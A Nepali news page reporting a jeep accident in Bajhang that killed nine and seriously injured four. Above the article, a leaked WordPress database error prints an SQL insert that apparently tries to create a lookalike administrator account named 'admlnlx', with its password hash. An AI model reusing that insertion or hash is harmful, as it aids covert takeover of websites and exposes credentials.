WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbLgtd1ZcGK8n3E2.zP/4KF4CLTm2w1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 11:03:23', '', 'admlnlx', 'admlnlx')

बझाङमा जीप दुर्घटना, ९ जनाको मृत्यु – Gaule Khabar

बझाङमा जीप दुर्घटना, ९ जनाको मृत्यु

बझाङमा जीप दुर्घटना, ९ जनाको मृत्यु

गाउँले न्यूज, २ असार, काठमाडौं । बझाङमा जीप दुर्घटना हुँदा ९ जनाको मृत्यु भएको छ । थप ४ जना गम्भीर घाइते भएका छन् ।
सदरमुकाम चैनपुर नजिकै रहेको डुङ्रीबाट मष्टा गाँउपालिका जाँदै गरेको स १ ज १०७२ नम्बरको जीप डौठी भन्ने ठाँउमा दुर्घटना भएको प्रहरीले जनाएको छ ।
दुर्घटनामा परी मृत्यु भएको सनाखत हुन सकेको छैन ।
घाइतेहरुको उद्दार जारी छ । जीप सडकबाट ४०० मिटर तल अप्ठ्यारो ठाँउमा खसेको र मानिस जान नसक्ने भएकाले उद्दारमा कठिनाई भइरहेको प्रहरीले जनाएको छ ।

sourse:onlinekhabar

 

https://gaulenews.com/?p=46764

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका